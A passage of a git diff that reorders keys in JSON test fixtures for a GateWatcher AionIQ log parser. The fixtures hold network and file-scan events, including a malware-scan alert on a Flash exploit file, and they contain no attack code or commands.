-    "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"port\": 80,\n    \"ip\": \"202.129.215.251\"\n  },\n  \"file\": {\n    \"magic\": \"Macromedia Flash data (compressed), version 13\",\n    \"sid\": [\n      1100020\n    ],\n    \"hash\": {\n      \"sha256\": \"6d3a6e2c771ab1a3721235ed3b3c4a2c3013290564272bcb6fbc9a15be79278b\"\n    },\n    \"name\": \"/\",\n    \"file_id\": 219,\n    \"tx_id\": 2,\n    \"state\": \"CLOSED\",\n    \"gaps\": false,\n    \"size\": 55351,\n    \"stored\": true\n  },\n  \"@timestamp\": \"2024-09-11T09:31:00.111583612Z\",\n  \"malcore\": {\n    \"file_type\": \"application/x-shockwave-flash\",\n    \"analyzers_up\": 16,\n    \"analyzed_clean\": 9,\n    \"engines_last_update_date\": \"2024-09-03T17:15:00Z\",\n    \"state\": \"Infected\",\n    \"total_found\": \"3/16\",\n    \"detail_scan_time\": 373,\n    \"reporting_token\": \"\",\n    \"analyzed_infected\": 3,\n    \"detail_threat_found\": \"Infected : EXP/Flash.EB.502, SWF/Exploit, Exploit.Flash\",\n    \"analyzed_suspicious\": 0,\n    \"analyzed_error\": 0,\n    \"processing_time\": 1576,\n    \"engine_id\": {\n      \"5\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"c18ab9n\"\n      },\n      \"8\": {\n        \"scan_result\": \"INFECTED\",\n        \"threat_details\": \"Exploit.Flash\",\n        \"id\": \"ib54e9s\"\n      },\n      \"4\": {\n        \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n        \"threat_details\": \"\",\n        \"id\": \"c10195e\"\n      },\n      \"14\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"t3114fn\"\n      },\n      \"13\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"sde882s\"\n      },\n      \"9\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"kfb8487\"\n      },\n      \"12\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"qb9308l\"\n      },\n      \"10\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"mb2b5fe\"\n      },\n      \"0\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"a32935b\"\n      },\n      \"15\": {\n        \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n        \"threat_details\": \"\",\n        \"id\": \"we9a17t\"\n      },\n      \"6\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"c81e55c\"\n      },\n      \"7\": {\n        \"scan_result\": \"NOT_SCANNED\",\n        \"threat_details\": \"\",\n        \"id\": \"e83bf1t\"\n      },\n      \"3\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"b557a5r\"\n      },\n      \"1\": {\n        \"scan_result\": \"INFECTED\",\n        \"threat_details\": \"EXP/Flash.EB.502\",\n        \"id\": \"acf9bba\"\n      },\n      \"11\": {\n        \"scan_result\": \"NOT_SCANNED\",\n        \"threat_details\": \"Unavailable (permanently_failed)\",\n        \"id\": \"n00000e\"\n      },\n      \"2\": {\n        \"scan_result\": \"INFECTED\",\n        \"threat_details\": \"SWF/Exploit\",\n        \"id\": \"af7872b\"\n      }\n    },\n    \"detail_wait_time\": 660,\n    \"file_type_description\": \"Macromedia Flash Player\",\n    \"code\": 1,\n    \"magic_details\": \"Macromedia Flash data (compressed), version 13\",\n    \"analyzed_other\": 4\n  },\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"timestamp\": \"2024-09-11T09:15:23.329615+0000\",\n    \"transport\": \"tcp\",\n    \"flow_id\": 1779492455056060\n  },\n  \"destination\": {\n    \"port\": 47858,\n    \"ip\": \"27.0.0.144\"\n  },\n  \"url\": {\n    \"domain\": \"chunky.enchantingweddingsandevents.co.uk\",\n    \"path\": \"/?q=&g=BDvv&y=enL16_6s_&s=t5qV-&e=_b_J--DqR&w=C2pZhaRyfn3uVT_v5Sfgs\"\n  },\n  \"user_agent\": {\n    \"original\": \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"hostname\": \"chunky.enchantingweddingsandevents.co.uk\",\n    \"version\": \"HTTP/1.1\",\n    \"http_refer\": \"http://chunky.enchantingweddingsandevents.co.uk/topic/03251-esplanade-interoperability-fuchsias-renegotiate-percent-youngster-trounced/\",\n    \"response\": {\n      \"status\": 200,\n      \"mime_type\": \"application/x-shockwave-flash\",\n      \"bytes\": 55351\n    }\n  },\n  \"event\": {\n    \"id\": \"7c4e2a77-3481-4201-8247-889fe0718ed8\",\n    \"kind\": \"alert\",\n    \"module\": \"malcore\",\n    \"severity\": 1,\n    \"category\": [\n      \"network\",\n      \"file\"\n    ],\n    \"created\": \"2024-09-11T09:15:23.329615+0000\",\n    \"dataset\": \"alert\"\n  }\n}"
+    }
   },
   "expected": {
     "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"port\": 80,\n    \"ip\": \"202.129.215.251\"\n  },\n  \"file\": {\n    \"magic\": \"Macromedia Flash data (compressed), version 13\",\n    \"sid\": [\n      1100020\n    ],\n    \"hash\": {\n      \"sha256\": \"6d3a6e2c771ab1a3721235ed3b3c4a2c3013290564272bcb6fbc9a15be79278b\"\n    },\n    \"name\": \"/\",\n    \"file_id\": 219,\n    \"tx_id\": 2,\n    \"state\": \"CLOSED\",\n    \"gaps\": false,\n    \"size\": 55351,\n    \"stored\": true\n  },\n  \"@timestamp\": \"2024-09-11T09:31:00.111583612Z\",\n  \"malcore\": {\n    \"file_type\": \"application/x-shockwave-flash\",\n    \"analyzers_up\": 16,\n    \"analyzed_clean\": 9,\n    \"engines_last_update_date\": \"2024-09-03T17:15:00Z\",\n    \"state\": \"Infected\",\n    \"total_found\": \"3/16\",\n    \"detail_scan_time\": 373,\n    \"reporting_token\": \"\",\n    \"analyzed_infected\": 3,\n    \"detail_threat_found\": \"Infected : EXP/Flash.EB.502, SWF/Exploit, Exploit.Flash\",\n    \"analyzed_suspicious\": 0,\n    \"analyzed_error\": 0,\n    \"processing_time\": 1576,\n    \"engine_id\": {\n      \"5\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"c18ab9n\"\n      },\n      \"8\": {\n        \"scan_result\": \"INFECTED\",\n        \"threat_details\": \"Exploit.Flash\",\n        \"id\": \"ib54e9s\"\n      },\n      \"4\": {\n        \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n        \"threat_details\": \"\",\n        \"id\": \"c10195e\"\n      },\n      \"14\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"t3114fn\"\n      },\n      \"13\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"sde882s\"\n      },\n      \"9\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"kfb8487\"\n      },\n      \"12\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"qb9308l\"\n      },\n      \"10\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"mb2b5fe\"\n      },\n      \"0\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"a32935b\"\n      },\n      \"15\": {\n        \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n        \"threat_details\": \"\",\n        \"id\": \"we9a17t\"\n      },\n      \"6\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"c81e55c\"\n      },\n      \"7\": {\n        \"scan_result\": \"NOT_SCANNED\",\n        \"threat_details\": \"\",\n        \"id\": \"e83bf1t\"\n      },\n      \"3\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"b557a5r\"\n      },\n      \"1\": {\n        \"scan_result\": \"INFECTED\",\n        \"threat_details\": \"EXP/Flash.EB.502\",\n        \"id\": \"acf9bba\"\n      },\n      \"11\": {\n        \"scan_result\": \"NOT_SCANNED\",\n        \"threat_details\": \"Unavailable (permanently_failed)\",\n        \"id\": \"n00000e\"\n      },\n      \"2\": {\n        \"scan_result\": \"INFECTED\",\n        \"threat_details\": \"SWF/Exploit\",\n        \"id\": \"af7872b\"\n      }\n    },\n    \"detail_wait_time\": 660,\n    \"file_type_description\": \"Macromedia Flash Player\",\n    \"code\": 1,\n    \"magic_details\": \"Macromedia Flash data (compressed), version 13\",\n    \"analyzed_other\": 4\n  },\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"timestamp\": \"2024-09-11T09:15:23.329615+0000\",\n    \"transport\": \"tcp\",\n    \"flow_id\": 1779492455056060\n  },\n  \"destination\": {\n    \"port\": 47858,\n    \"ip\": \"27.0.0.144\"\n  },\n  \"url\": {\n    \"domain\": \"chunky.enchantingweddingsandevents.co.uk\",\n    \"path\": \"/?q=&g=BDvv&y=enL16_6s_&s=t5qV-&e=_b_J--DqR&w=C2pZhaRyfn3uVT_v5Sfgs\"\n  },\n  \"user_agent\": {\n    \"original\": \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"hostname\": \"chunky.enchantingweddingsandevents.co.uk\",\n    \"version\": \"HTTP/1.1\",\n    \"http_refer\": \"http://chunky.enchantingweddingsandevents.co.uk/topic/03251-esplanade-interoperability-fuchsias-renegotiate-percent-youngster-trounced/\",\n    \"response\": {\n      \"status\": 200,\n      \"mime_type\": \"application/x-shockwave-flash\",\n      \"bytes\": 55351\n    }\n  },\n  \"event\": {\n    \"id\": \"7c4e2a77-3481-4201-8247-889fe0718ed8\",\n    \"kind\": \"alert\",\n    \"module\": \"malcore\",\n    \"severity\": 1,\n    \"category\": [\n      \"network\",\n      \"file\"\n    ],\n    \"created\": \"2024-09-11T09:15:23.329615+0000\",\n    \"dataset\": \"alert\"\n  }\n}",
diff --git a/GateWatcher/aioniq_ecs/tests/metadata.json b/GateWatcher/aioniq_ecs/tests/metadata.json
index 0530043dc..124260a3d 100644
--- a/GateWatcher/aioniq_ecs/tests/metadata.json
+++ b/GateWatcher/aioniq_ecs/tests/metadata.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"mac\": \"00:50:56:91:85:03\",\n    \"port\": 56098,\n    \"ip\": \"10.2.19.131\"\n  },\n  \"metadata\": {\n    \"flowbits\": [\n      \"min.gethttp\",\n      \"exe.no.referer\",\n      \"ET.http.binary\"\n    ]\n  },\n  \"@timestamp\": \"2024-09-12T13:24:51.231Z\",\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"community_id\": \"1:X+96B6BxVtmLT4rsbtdZeemyV0M=\",\n    \"timestamp\": \"2024-09-12T13:24:15.978904+0000\",\n    \"transport\": \"tcp\",\n    \"tx_id\": 6,\n    \"flow_id\": 803295979358070\n  },\n  \"destination\": {\n    \"mac\": \"00:09:0f:09:00:12\",\n    \"port\": 80,\n    \"ip\": \"10.2.10.205\"\n  },\n  \"url\": {\n    \"path\": \"/FireInstaller4.exe\"\n  },\n  \"user_agent\": {\n    \"original\": \"nghttp2/1.43.0\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    \"request_headers\": [\n      {\n        \"name\": \":method\",\n        \"value\": \"GET\"\n      },\n      {\n        \"name\": \":path\",\n        \"value\": \"/FireInstaller4.exe\"\n      },\n      {\n        \"name\": \":scheme\",\n        \"value\": \"http\"\n      },\n      {\n        \"name\": \":authority\",\n        \"value\": \"10.2.10.205\"\n      },\n      {\n        \"name\": \"accept\",\n        \"value\": \"*/*\"\n      },\n      {\n        \"name\": \"accept-encoding\",\n        \"value\": \"gzip, deflate\"\n      },\n      {\n        \"name\": \"user-agent\",\n        \"value\": \"nghttp2/1.43.0\"\n      }\n    ],\n    \"http2\": {\n      \"request\": {\n        \"priority\": 15\n      },\n      \"stream_id\": 13,\n      \"response\": {}\n    },\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"response_headers\": [\n      {\n        \"name\": \":status\",\n        \"value\": \"200\"\n      },\n      {\n        \"name\": \"server\",\n        \"value\": \"nginx/1.25.2\"\n      },\n      {\n        \"name\": \"date\",\n        \"value\": \"Mon, 08 Jan 2024 15:27:20 GMT\"\n      },\n      {\n        \"name\": \"content-type\",\n        \"value\": \"text/plain\"\n      },\n      {\n        \"name\": \"content-length\",\n        \"value\": \"319824\"\n      },\n      {\n        \"name\": \"last-modified\",\n        \"value\": \"Mon, 08 Jan 2024 15:21:12 GMT\"\n      },\n      {\n        \"name\": \"etag\",\n        \"value\": \"\\\"659c12e8-4e150\\\"\"\n      },\n      {\n        \"name\": \"accept-ranges\",\n        \"value\": \"bytes\"\n      }\n    ],\n    \"version\": \"2\",\n    \"response\": {\n      \"status\": 200,\n      \"bytes\": 319824\n    }\n  },\n  \"event\": {\n    \"kind\": \"event\",\n    \"module\": \"sigflow_http\",\n    \"category\": [\n      \"network\"\n    ],\n    \"created\": \"2024-09-12T13:24:15.978904+0000\",\n    \"dataset\": \"network_metadata\",\n    \"id\": \"78681613-57af-4e10-b732-58f5d2e0ae12\"\n  }\n}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ V103",
         "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
       }
-    },
-    "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"mac\": \"00:50:56:91:85:03\",\n    \"port\": 56098,\n    \"ip\": \"10.2.19.131\"\n  },\n  \"metadata\": {\n    \"flowbits\": [\n      \"min.gethttp\",\n      \"exe.no.referer\",\n      \"ET.http.binary\"\n    ]\n  },\n  \"@timestamp\": \"2024-09-12T13:24:51.231Z\",\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"community_id\": \"1:X+96B6BxVtmLT4rsbtdZeemyV0M=\",\n    \"timestamp\": \"2024-09-12T13:24:15.978904+0000\",\n    \"transport\": \"tcp\",\n    \"tx_id\": 6,\n    \"flow_id\": 803295979358070\n  },\n  \"destination\": {\n    \"mac\": \"00:09:0f:09:00:12\",\n    \"port\": 80,\n    \"ip\": \"10.2.10.205\"\n  },\n  \"url\": {\n    \"path\": \"/FireInstaller4.exe\"\n  },\n  \"user_agent\": {\n    \"original\": \"nghttp2/1.43.0\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    \"request_headers\": [\n      {\n        \"name\": \":method\",\n        \"value\": \"GET\"\n      },\n      {\n        \"name\": \":path\",\n        \"value\": \"/FireInstaller4.exe\"\n      },\n      {\n        \"name\": \":scheme\",\n        \"value\": \"http\"\n      },\n      {\n        \"name\": \":authority\",\n        \"value\": \"10.2.10.205\"\n      },\n      {\n        \"name\": \"accept\",\n        \"value\": \"*/*\"\n      },\n      {\n        \"name\": \"accept-encoding\",\n        \"value\": \"gzip, deflate\"\n      },\n      {\n        \"name\": \"user-agent\",\n        \"value\": \"nghttp2/1.43.0\"\n      }\n    ],\n    \"http2\": {\n      \"request\": {\n        \"priority\": 15\n      },\n      \"stream_id\": 13,\n      \"response\": {}\n    },\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"response_headers\": [\n      {\n        \"name\": \":status\",\n        \"value\": \"200\"\n      },\n      {\n        \"name\": \"server\",\n        \"value\": \"nginx/1.25.2\"\n      },\n      {\n        \"name\": \"date\",\n        \"value\": \"Mon, 08 Jan 2024 15:27:20 GMT\"\n      },\n      {\n        \"name\": \"content-type\",\n        \"value\": \"text/plain\"\n      },\n      {\n        \"name\": \"content-length\",\n        \"value\": \"319824\"\n      },\n      {\n        \"name\": \"last-modified\",\n        \"value\": \"Mon, 08 Jan 2024 15:21:12 GMT\"\n      },\n      {\n        \"name\": \"etag\",\n        \"value\": \"\\\"659c12e8-4e150\\\"\"\n      },\n      {\n        \"name\": \"accept-ranges\",\n        \"value\": \"bytes\"\n      }\n    ],\n    \"version\": \"2\",\n    \"response\": {\n      \"status\": 200,\n      \"bytes\": 319824\n    }\n  },\n  \"event\": {\n    \"kind\": \"event\",\n    \"module\": \"sigflow_http\",\n    \"category\": [\n      \"network\"\n    ],\n    \"created\": \"2024-09-12T13:24:15.978904+0000\",\n    \"dataset\": \"network_metadata\",\n    \"id\": \"78681613-57af-4e10-b732-58f5d2e0ae12\"\n  }\n}"
+    }
   },
   "expected": {
     "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"mac\": \"00:50:56:91:85:03\",\n    \"port\": 56098,\n    \"ip\": \"10.2.19.131\"\n  },\n  \"metadata\": {\n    \"flowbits\": [\n      \"min.gethttp\",\n      \"exe.no.referer\",\n      \"ET.http.binary\"\n    ]\n  },\n  \"@timestamp\": \"2024-09-12T13:24:51.231Z\",\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"community_id\": \"1:X+96B6BxVtmLT4rsbtdZeemyV0M=\",\n    \"timestamp\": \"2024-09-12T13:24:15.978904+0000\",\n    \"transport\": \"tcp\",\n    \"tx_id\": 6,\n    \"flow_id\": 803295979358070\n  },\n  \"destination\": {\n    \"mac\": \"00:09:0f:09:00:12\",\n    \"port\": 80,\n    \"ip\": \"10.2.10.205\"\n  },\n  \"url\": {\n    \"path\": \"/FireInstaller4.exe\"\n  },\n  \"user_agent\": {\n    \"original\": \"nghttp2/1.43.0\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    \"request_headers\": [\n      {\n        \"name\": \":method\",\n        \"value\": \"GET\"\n      },\n      {\n        \"name\": \":path\",\n        \"value\": \"/FireInstaller4.exe\"\n      },\n      {\n        \"name\": \":scheme\",\n        \"value\": \"http\"\n      },\n      {\n        \"name\": \":authority\",\n        \"value\": \"10.2.10.205\"\n      },\n      {\n        \"name\": \"accept\",\n        \"value\": \"*/*\"\n      },\n      {\n        \"name\": \"accept-encoding\",\n        \"value\": \"gzip, deflate\"\n      },\n      {\n        \"name\": \"user-agent\",\n        \"value\": \"nghttp2/1.43.0\"\n      }\n    ],\n    \"http2\": {\n      \"request\": {\n        \"priority\": 15\n      },\n      \"stream_id\": 13,\n      \"response\": {}\n    },\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"response_headers\": [\n      {\n        \"name\": \":status\",\n        \"value\": \"200\"\n      },\n      {\n        \"name\": \"server\",\n        \"value\": \"nginx/1.25.2\"\n      },\n      {\n        \"name\": \"date\",\n        \"value\": \"Mon, 08 Jan 2024 15:27:20 GMT\"\n      },\n      {\n        \"name\": \"content-type\",\n        \"value\": \"text/plain\"\n      },\n      {\n        \"name\": \"content-length\",\n        \"value\": \"319824\"\n      },\n      {\n        \"name\": \"last-modified\",\n        \"value\": \"Mon, 08 Jan 2024 15:21:12 GMT\"\n      },\n      {\n        \"name\": \"etag\",\n        \"value\": \"\\\"659c12e8-4e150\\\"\"\n      },\n      {\n        \"name\": \"accept-ranges\",\n        \"value\": \"bytes\"\n      }\n    ],\n    \"version\": \"2\",\n    \"response\": {\n      \"status\": 200,\n      \"bytes\": 319824\n    }\n  },\n  \"event\": {\n    \"kind\": \"event\",\n    \"module\": \"sigflow_http\",\n    \"category\": [\n      \"network\"\n    ],\n    \"created\": \"2024-09-12T13:24:15.978904+0000\",\n    \"dataset\": \"network_metadata\",\n    \"id\": \"78681613-57af-4e10-b732-58f5d2e0ae12\"\n  }\n}",
diff --git a/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json b/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json
index d575e8d2a..c75ee56b5 100644
--- a/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json
+++ b/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"port\": 80,\n    \"ip\": \"56.53.117.115\"\n  },\n  \"file\": {\n    \"magic\": \"PDF document, version 1.5\",\n    \"sid\": [\n      1100008\n    ],\n    \"hash\": {\n      \"sha256\": \"50c561f1e32cb1990a3050015088713e657f0081ba774dda2f9fcef828dcf703\"\n    },\n    \"name\": \"/malcore_10KB_clean.pdf\",\n    \"file_id\": 224,\n    \"tx_id\": 0,\n    \"state\": \"CLOSED\",\n    \"gaps\": false,\n    \"size\": 10456,\n    \"stored\": true\n  },\n  \"@timestamp\": \"2024-09-11T13:56:19.010Z\",\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"timestamp\": \"2024-09-11T13:55:51.326090+0000\",\n    \"transport\": \"tcp\",\n    \"flow_id\": 1331841998458539\n  },\n  \"destination\": {\n    \"port\": 62832,\n    \"ip\": \"65.100.113.120\"\n  },\n  \"url\": {\n    \"domain\": \"56.53.117.115\",\n    \"path\": \"/malcore_10KB_clean.pdf\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"hostname\": \"56.53.117.115\",\n    \"version\": \"HTTP/1.1\",\n    \"response\": {\n      \"status\": 200,\n      \"mime_type\": \"application/pdf\",\n      \"bytes\": 10456\n    }\n  },\n  \"event\": {\n    \"kind\": \"event\",\n    \"module\": \"sigflow_file\",\n    \"category\": [\n      \"network\",\n      \"file\"\n    ],\n    \"created\": \"2024-09-11T13:55:51.326090+0000\",\n    \"dataset\": \"network_metadata\",\n    \"id\": \"d66539e6-825e-4516-8c8c-2778dd6d9358\"\n  }\n}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ V103",
         "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
       }
-    },
-    "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"port\": 80,\n    \"ip\": \"56.53.117.115\"\n  },\n  \"file\": {\n    \"magic\": \"PDF document, version 1.5\",\n    \"sid\": [\n      1100008\n    ],\n    \"hash\": {\n      \"sha256\": \"50c561f1e32cb1990a3050015088713e657f0081ba774dda2f9fcef828dcf703\"\n    },\n    \"name\": \"/malcore_10KB_clean.pdf\",\n    \"file_id\": 224,\n    \"tx_id\": 0,\n    \"state\": \"CLOSED\",\n    \"gaps\": false,\n    \"size\": 10456,\n    \"stored\": true\n  },\n  \"@timestamp\": \"2024-09-11T13:56:19.010Z\",\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"timestamp\": \"2024-09-11T13:55:51.326090+0000\",\n    \"transport\": \"tcp\",\n    \"flow_id\": 1331841998458539\n  },\n  \"destination\": {\n    \"port\": 62832,\n    \"ip\": \"65.100.113.120\"\n  },\n  \"url\": {\n    \"domain\": \"56.53.117.115\",\n    \"path\": \"/malcore_10KB_clean.pdf\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"hostname\": \"56.53.117.115\",\n    \"version\": \"HTTP/1.1\",\n    \"response\": {\n      \"status\": 200,\n      \"mime_type\": \"application/pdf\",\n      \"bytes\": 10456\n    }\n  },\n  \"event\": {\n    \"kind\": \"event\",\n    \"module\": \"sigflow_file\",\n    \"category\": [\n      \"network\",\n      \"file\"\n    ],\n    \"created\": \"2024-09-11T13:55:51.326090+0000\",\n    \"dataset\": \"network_metadata\",\n    \"id\": \"d66539e6-825e-4516-8c8c-2778dd6d9358\"\n  }\n}"
+    }
   },
   "expected": {
     "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"port\": 80,\n    \"ip\": \"56.53.117.115\"\n  },\n  \"file\": {\n    \"magic\": \"PDF document, version 1.5\",\n    \"sid\": [\n      1100008\n    ],\n    \"hash\": {\n      \"sha256\": \"50c561f1e32cb1990a3050015088713e657f0081ba774dda2f9fcef828dcf703\"\n    },\n    \"name\": \"/malcore_10KB_clean.pdf\",\n    \"file_id\": 224,\n    \"tx_id\": 0,\n    \"state\": \"CLOSED\",\n    \"gaps\": false,\n    \"size\": 10456,\n    \"stored\": true\n  },\n  \"@timestamp\": \"2024-09-11T13:56:19.010Z\",\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"timestamp\": \"2024-09-11T13:55:51.326090+0000\",\n    \"transport\": \"tcp\",\n    \"flow_id\": 1331841998458539\n  },\n  \"destination\": {\n    \"port\": 62832,\n    \"ip\": \"65.100.113.120\"\n  },\n  \"url\": {\n    \"domain\": \"56.53.117.115\",\n    \"path\": \"/malcore_10KB_clean.pdf\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"hostname\": \"56.53.117.115\",\n    \"version\": \"HTTP/1.1\",\n    \"response\": {\n      \"status\": 200,\n      \"mime_type\": \"application/pdf\",\n      \"bytes\": 10456\n    }\n  },\n  \"event\": {\n    \"kind\": 